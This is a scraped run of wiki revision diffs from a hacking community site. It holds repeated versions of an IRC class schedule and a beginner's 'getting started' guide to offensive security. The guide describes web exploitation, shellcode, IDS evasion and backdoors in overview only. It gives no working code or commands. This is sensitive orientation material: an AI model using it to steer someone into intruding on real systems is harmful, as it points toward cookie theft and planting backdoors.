21:00<br />
22:00<br />
23:00<br />
<br />
==Thursday - 9/20==<br />
'''00:00 - 01:00''' ''[[Shellcode]] panel'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Friday - 9/21==<br />
'''00:00 - 01:00''' ''Intermediate [[User:Hatter/shellcode|shellcoding]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
'''21:00 - 22:00''' ''Introduction to GDB'' -- '''[[User:Rorschach|rorschach]]'''<br />
22:00<br />
23:00</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Current:Classes&diff=9027Current:Classes2012-09-17T17:32:09Z<p>DPYJulietowbaijc: /* Wednesday - 9/19 */</p>
<hr />
<div>All class and panel times are in UTC-0. Join us in [[IRC]] for lectures and Q&A. (''[http://whattimeisit.com What time is it in UTC?]'')<br />
<br />
'''''Want to teach or participate in a panel?''''' <br />
<br />
:* Make a wiki account<br />
:* Put a link to your user page and topic in the desired time slot.<br />
::* Do not feel constrained to hour-long time blocks; you may use increments of less than one hour.<br />
::* You may book more than one hour if you feel you need it, but please be conservative.<br />
:* '''Come to [[IRC]] during your scheduled course interval'''<br />
<br />
==Requests==<br />
<br />
Place any requests for classes in here, or even ideas for other speakers. Some people want to speak but don't know what to speak about.<br />
<br />
* Heap Overflows<br />
* Integer overflows/underflows<br />
* Null pointer dereference attacks<br />
* Reverse engineering<br />
* Applied cryptography<br />
* Linux distribution comparison/discussion<br />
* Android hardening<br />
<br />
==Monday - 9/17==<br />
<br />
'''00:00 - 01:00''' '''[http://pastebin.com/ZxhqH16C Log]''' ''What is [[SIM|security infrastructure]]?'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' '''[http://pastebin.com/9udApQq9 Log]''' ''Introduction to [[Python]]'' - '''[[User:Z|Z]]'''<br />
'''02:00 - 03:00''' '''[http://pastebin.com/aVw7V8YF Log]''' ''Introduction to [[Nmap|network mapping]] Part 1'' - '''[[User:Foo|Foo]]'''<br />
'''03:00 - 04:00''' '''[http://pastebin.com/AXM4sghW Log]''' ''Anonymity Online (or How to be a Ghost)'' - '''[[User:Rorschach|rorschach]]'''<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Tuesday - 9/18==<br />
'''00:00 - 01:00''' ''Remote [[SQL injection]] testing'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' ''Introduction to [[Python]] (cont.)'' - '''[[User:z|z]]'''<br />
'''02:00 - 03:00''' ''Introduction to [[Nmap|network mapping]] Part 2'' - '''[[User:Foo|Foo]]'''<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Wednesday - 9/19==<br />
'''00:00 - 01:00''' ''Introduction to Assembly Code'' - '''[[User:M4tr1c3s|m4]]'''<br />
'''01:00 - 02:00''' ''An introduction to the [[User:Hatter/ELF format|ELF Format]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
'''20:00 - 21:00''' ''Introduction to Ptrace'' -- '''[[User:Rorschach|rorschach]]'''<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Thursday - 9/20==<br />
'''00:00 - 01:00''' ''[[Shellcode]] panel'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Friday - 9/21==<br />
'''00:00 - 01:00''' ''Intermediate [[User:Hatter/shellcode|shellcoding]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
'''21:00 - 22:00''' ''Introduction to GDB'' -- '''[[User:Rorschach|rorschach]]'''<br />
22:00<br />
23:00</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Current:Classes&diff=9026Current:Classes2012-09-17T17:30:57Z<p>DPYJulietowbaijc: /* Tuesday - 9/18 */</p>
<hr />
<div>All class and panel times are in UTC-0. Join us in [[IRC]] for lectures and Q&A. (''[http://whattimeisit.com What time is it in UTC?]'')<br />
<br />
'''''Want to teach or participate in a panel?''''' <br />
<br />
:* Make a wiki account<br />
:* Put a link to your user page and topic in the desired time slot.<br />
::* Do not feel constrained to hour-long time blocks; you may use increments of less than one hour.<br />
::* You may book more than one hour if you feel you need it, but please be conservative.<br />
:* '''Come to [[IRC]] during your scheduled course interval'''<br />
<br />
==Requests==<br />
<br />
Place any requests for classes in here, or even ideas for other speakers. Some people want to speak but don't know what to speak about.<br />
<br />
* Heap Overflows<br />
* Integer overflows/underflows<br />
* Null pointer dereference attacks<br />
* Reverse engineering<br />
* Applied cryptography<br />
* Linux distribution comparison/discussion<br />
* Android hardening<br />
<br />
==Monday - 9/17==<br />
<br />
'''00:00 - 01:00''' '''[http://pastebin.com/ZxhqH16C Log]''' ''What is [[SIM|security infrastructure]]?'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' '''[http://pastebin.com/9udApQq9 Log]''' ''Introduction to [[Python]]'' - '''[[User:Z|Z]]'''<br />
'''02:00 - 03:00''' '''[http://pastebin.com/aVw7V8YF Log]''' ''Introduction to [[Nmap|network mapping]] Part 1'' - '''[[User:Foo|Foo]]'''<br />
'''03:00 - 04:00''' '''[http://pastebin.com/AXM4sghW Log]''' ''Anonymity Online (or How to be a Ghost)'' - '''[[User:Rorschach|rorschach]]'''<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Tuesday - 9/18==<br />
'''00:00 - 01:00''' ''Remote [[SQL injection]] testing'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' ''Introduction to [[Python]] (cont.)'' - '''[[User:z|z]]'''<br />
'''02:00 - 03:00''' ''Introduction to [[Nmap|network mapping]] Part 2'' - '''[[User:Foo|Foo]]'''<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Wednesday - 9/19==<br />
'''00:00 - 01:00''' ''An introduction to the [[User:Hatter/ELF format|ELF Format]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
'''20:00 - 21:00''' ''Introduction to Ptrace'' -- '''[[User:Rorschach|rorschach]]'''<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Thursday - 9/20==<br />
'''00:00 - 01:00''' ''[[Shellcode]] panel'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Friday - 9/21==<br />
'''00:00 - 01:00''' ''Intermediate [[User:Hatter/shellcode|shellcoding]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
'''21:00 - 22:00''' ''Introduction to GDB'' -- '''[[User:Rorschach|rorschach]]'''<br />
22:00<br />
23:00</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Current:Classes&diff=9025Current:Classes2012-09-17T17:29:01Z<p>DPYJulietowbaijc: </p>
<hr />
<div>All class and panel times are in UTC-0. Join us in [[IRC]] for lectures and Q&A. (''[http://whattimeisit.com What time is it in UTC?]'')<br />
<br />
'''''Want to teach or participate in a panel?''''' <br />
<br />
:* Make a wiki account<br />
:* Put a link to your user page and topic in the desired time slot.<br />
::* Do not feel constrained to hour-long time blocks; you may use increments of less than one hour.<br />
::* You may book more than one hour if you feel you need it, but please be conservative.<br />
:* '''Come to [[IRC]] during your scheduled course interval'''<br />
<br />
==Requests==<br />
<br />
Place any requests for classes in here, or even ideas for other speakers. Some people want to speak but don't know what to speak about.<br />
<br />
* Heap Overflows<br />
* Integer overflows/underflows<br />
* Null pointer dereference attacks<br />
* Reverse engineering<br />
* Applied cryptography<br />
* Linux distribution comparison/discussion<br />
* Android hardening<br />
<br />
==Monday - 9/17==<br />
<br />
'''00:00 - 01:00''' '''[http://pastebin.com/ZxhqH16C Log]''' ''What is [[SIM|security infrastructure]]?'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' '''[http://pastebin.com/9udApQq9 Log]''' ''Introduction to [[Python]]'' - '''[[User:Z|Z]]'''<br />
'''02:00 - 03:00''' '''[http://pastebin.com/aVw7V8YF Log]''' ''Introduction to [[Nmap|network mapping]] Part 1'' - '''[[User:Foo|Foo]]'''<br />
'''03:00 - 04:00''' '''[http://pastebin.com/AXM4sghW Log]''' ''Anonymity Online (or How to be a Ghost)'' - '''[[User:Rorschach|rorschach]]'''<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Tuesday - 9/18==<br />
'''00:00 - 01:00''' ''Remote [[SQL injection]] testing'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' ''Introduction to [[Python]] (cont.)'' - '''[[User:z|z]]'''<br />
'''02:00 - 03:00''' ''Introduction to [[Nmap|network mapping]] Part 2'' - '''[[User:Foo|Foo]]'''<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
'''21:00 - 22:00''' ''Assembly Introduction'' - '''[[User:M4tr1c3s|m4]]'''<br />
23:00<br />
<br />
==Wednesday - 9/19==<br />
'''00:00 - 01:00''' ''An introduction to the [[User:Hatter/ELF format|ELF Format]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
'''20:00 - 21:00''' ''Introduction to Ptrace'' -- '''[[User:Rorschach|rorschach]]'''<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Thursday - 9/20==<br />
'''00:00 - 01:00''' ''[[Shellcode]] panel'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Friday - 9/21==<br />
'''00:00 - 01:00''' ''Intermediate [[User:Hatter/shellcode|shellcoding]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
'''21:00 - 22:00''' ''Introduction to GDB'' -- '''[[User:Rorschach|rorschach]]'''<br />
22:00<br />
23:00</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7764User:Hatter/getting started2012-07-02T13:53:54Z<p>DPYJulietowbaijc: /* Code */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== [[Administration]] ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the Linux environment will make you much more efficient when using Linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to using a Linux system efficiently.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a Linux box - especially if you chose to use Gentoo. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature. It is also a good idea to check the [[Anonymity]] article for tips on how to keep your identity secret on the internet - depending on just what you intend to do, these measures can be as simple or as complex as you desire.<br />
<br />
== [[Programming|Code]] == <br />
<br />
[[Programming]] is the next essential skill. While it is possible to perform exploitation on an [[application]] without any knowledge of the language it is written in, understanding of the language allows for a deeper understanding of the way the application you are exploiting handles input and processes data - if you understand what makes it work, you will understand what makes it stop working in the way you want it to. If you want to go head-first, start programming with a [[compiled language]] or go to a lower level like [[assembly]]; if you prefer the easier approach, [[interpreted languages]] are the best place to start.<br />
<br />
[[Assembly]] and [[machine code]] are the building blocks of all other programming languages. Machine code is what most people think of when they refer to "binary code" (though it is more often represented as hexadecimal opcodes), and assembly is a system of mnemonic words to make machine code easier to work with - for example, "\xcd\x80" comes from "int $0x80". <br />
<br />
These languages are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]]. It is advisable to become familiar with C and at least learn enough assembly to understand how your C code is compiling. Learning interpreted languages such as PHP and Perl can also be useful for their flexibility and power.<br />
<br />
When learning to code, it is important to avoid the kinds of mistakes that lead to vulnerabilities in your code - such as [[Unsafe string replacement]]. Not only does learning about these vulnerabilities prevent your own code from being exploited, but the better you understand the potential pitfalls of a language, the better you can exploit those same pitfalls.<br />
<br />
== Information Gathering ==<br />
<br />
== [[Exploitation]] == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed to be a document and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== [[Web exploitation]] ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], plant [[database]]-powered [[privilege escalation]] [[SQL backdoors|backdoors]] and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]]. The [[Bleeding Life]] project contains [[shellcode]] which utilizes [[return oriented programming]] in order to bypass [[ASLR]] and [[DEP]] [[countermeasures]] for [[vulnerability|vulnerable]] [[applications|software]] running on the Windows 7 [[operating system]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7745User:Hatter/getting started2012-07-01T12:12:58Z<p>DPYJulietowbaijc: /* Code */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the Linux environment will make you much more efficient when using Linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to using a Linux system efficiently.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a Linux box - especially if you chose to use Gentoo. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature. It is also a good idea to check the [[Anonymity]] article for tips on how to keep your identity secret on the internet - depending on just what you intend to do, these measures can be as simple or as complex as you desire.<br />
<br />
== Code == <br />
<br />
[[Programming]] is the next essential skill. While it is possible to perform exploitation on an [[application]] without any knowledge of the language it is written in, understanding of the language allows for a deeper understanding of the way the application you are exploiting handles input and processes data - if you understand what makes it work, you will understand what makes it stop working in the way you want it to. Why blunder in the dark when the user manual is right before you? <br />
<br />
[[Assembly]] and [[machine code]] are the building blocks of all other programming languages. Machine code is what most people think of when they refer to "binary code" (though it is more often represented as hexadecimal opcodes), and assembly is a system of mnemonic words to make machine code easier to work with - for example, "\xcd\x80" comes from "int $0x80". <br />
<br />
These languages are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]]. It is advisable to become familiar with C and at least learn enough assembly to understand how your C code is compiling. Learning interpreted languages such as PHP and Perl can also be useful for their flexibility and power.<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed to be a document and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7744User:Hatter/getting started2012-07-01T12:12:42Z<p>DPYJulietowbaijc: /* Code */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration, and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the linux environment will make you much more efficient when using linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to efficiently using a linux system.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a Linux box - especially if you chose to use Gentoo. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature. It is also a good idea to check the [[Anonymity]] article for tips on how to keep your identity secret on the internet - depending on just what you intend to do, these measures can be as simple or as complex as you desire.<br />
<br />
== Code == <br />
<br />
[[Programming]] is the next essential skill. While it is possible to perform exploitation on an [[application]] without any knowledge of the language it is written in, knowing the language gives a deeper understanding of the way the application you are exploiting handles input and processes data - if you understand what makes it work, you will understand what makes it stop working in the way you want it to. Why blunder in the dark when the user manual is right before you? <br />
<br />
<br />
[[Assembly]] and [[machine code]] are the building blocks of all other programming languages. Machine code is what most people think of when they refer to "binary code" (though it is more often represented as hexadecimal opcodes), and assembly is a system of mnemonic words that makes machine code easier to work with - for example, the machine code "\xcd\x80" is written in assembly as "int $0x80". <br />
<br />
These languages are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]]. It is advisable to become familiar with C and at least learn enough assembly to understand how your C code is compiling. Learning interpreted languages such as PHP and Perl can also be useful for their flexibility and power.<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed as a document format and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s, makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7743User:Hatter/getting started2012-07-01T12:04:05Z<p>DPYJulietowbaijc: /* Code */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the Linux environment will make you much more efficient when using Linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to using a Linux system efficiently.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a Linux box - especially if you chose to use Gentoo. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature. It is also a good idea to check the [[Anonymity]] article for tips on how to keep your identity secret on the internet - depending on just what you intend to do, these measures can be as simple or as complex as you desire.<br />
<br />
== Code == <br />
<br />
[[Programming]] is the next essential skill. While it is possible to perform exploitation on an [[application]] without any knowledge of the language it is written in, knowing the language gives a deeper understanding of the way the application you are exploiting handles input and processes data - if you understand what makes it work, you will understand what makes it stop working in the way you want it to. Why blunder in the dark when the user manual is right before you? <br />
<br />
<br />
[[Assembly]] and [[machine code]] are the building blocks of all other programming languages. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed as a document format and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
